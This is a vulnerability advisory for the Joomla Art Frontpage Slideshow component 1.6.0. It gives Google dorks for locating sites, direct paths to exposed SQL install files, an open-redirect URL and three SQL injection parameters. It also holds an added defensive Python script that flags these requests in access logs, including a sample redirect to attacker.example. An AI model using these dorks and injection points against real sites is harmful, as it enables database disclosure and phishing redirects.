
Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection

Author: KingSkrupellos , Published: 01-02-2019
####################################################################################################

# Exploit Title : Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : artetics.com
# Software Information Link : joomlaworks.net/extensions/commercial/frontpage-slideshow
# Software Download Link : extensions.joomla.org/extension/art-frontpage-slideshow/
# Affected Versions : 1.5.3 and 1.6.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/index.php?option=com_fpss
inurl:''/administrator/components/com_fpss/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################################################

Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection

####################################################################################################

# Description :
*************

Art Frontpage Slideshow is a slideshow module that adds front-end animation
to attract visitors and lets a site show images of featured products
and news in an eye-catching way.

####################################################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_fpss/fpss.sql
/administrator/components/com_fpss/install.mysql.sql

# Open Redirection Exploit :
*************************

/index.php?option=com_fpss&task=track&id=[ID-NUMBER]&url=[SITE-ADDRESS]

# SQL Injection Exploit :
***********************

/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=[SQL Injection]

/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=atom&lang=[SQL Injection]

/index.php?option=com_fpss&view=article&id=[ID-NUMBER]:article-[ARTICLE-NUMBER]&catid=[ID-NUMBER]:articles&Itemid=[SQL Injection]
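Added example (not part of the original advisory): a small Python triage script that reads web server access-log lines and flags the three request patterns described above (direct fetches of the com_fpss .sql files, `task=track` redirects to an off-site `url`, and quote/comment markers in the `type`, `lang` and `Itemid` parameters). The log lines, hosts and IPs are constructed for the demo; `own_host` is an assumed parameter naming the site's own hostname.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed Apache combined-format lines (hypothetical hosts/IPs, not from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jan/2019:10:00:01 +0000] "GET /administrator/components/com_fpss/install.mysql.sql HTTP/1.1" 200 8123 "-" "curl/7.58"
203.0.113.5 - - [19/Jan/2019:10:00:02 +0000] "GET /index.php?option=com_fpss&task=track&id=12&url=http://attacker.example/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Jan/2019:10:00:03 +0000] "GET /index.php?option=com_fpss&task=module&id=27&format=feed&type=1%27 HTTP/1.1" 500 412 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Jan/2019:10:00:04 +0000] "GET /index.php?option=com_fpss&task=module&id=27&format=feed&type=atom HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# client IP, request target and status code from a combined-format line
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# crude SQL-injection markers; parse_qs already percent-decodes the values
SQLI_MARKERS = re.compile(r"(%27|'|%22|\"|--|/\*|\bunion\b|\bselect\b)", re.I)
SQLI_PARAMS = ("type", "lang", "Itemid")  # parameters named in the advisory

def classify(path, own_host):
    """Return finding labels for one request target, one per issue in the advisory."""
    findings = []
    parsed = urlparse(path)
    p = parsed.path.lower()
    if p.startswith("/administrator/components/com_fpss/") and p.endswith(".sql"):
        findings.append("db-disclosure")
    q = parse_qs(parsed.query, keep_blank_values=True)
    if q.get("option", [""])[0] != "com_fpss":
        return findings
    if q.get("task", [""])[0] == "track" and "url" in q:
        target = urlparse(unquote(q["url"][0]))
        # a redirect target with a host other than our own is the open-redirect case
        if target.netloc and target.netloc.lower() != own_host.lower():
            findings.append("open-redirect")
    for name in SQLI_PARAMS:
        if any(SQLI_MARKERS.search(v) for v in q.get(name, [])):
            findings.append(f"sqli:{name}")
    return findings

def triage(log_text, own_host="www.example.org"):
    """Parse access-log text; return (client_ip, status, findings) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        found = classify(path, own_host)
        if found:
            hits.append((ip, int(status), found))
    return hits

if __name__ == "__main__":
    for ip, status, found in triage(SAMPLE_LOG):
        print(ip, status, ", ".join(found))
```

A 500 on a feed request whose `type` or `lang` carries a quote is the same condition that produces the database errors shown later in this advisory, so those hits are worth correlating with the PHP error log.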

####################################################################################################

# Example Vulnerable Sites :
*************************


####################################################################################################

# Example SQL Database Error :

Warning: session_start() [function.session-start]: Cannot send session cookie -
headers already sent by (output started at /home/content/64/4351964/html/configuration.php:1)
in /home/content/64/4351964/html/libraries/joomla/session/session.php on line 423

Strict Standards: Non-static method JLoader::import() should
not be called statically in /home/uadvirtual/public_html/main
/libraries/joomla/import.php on line 29

####################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################################################
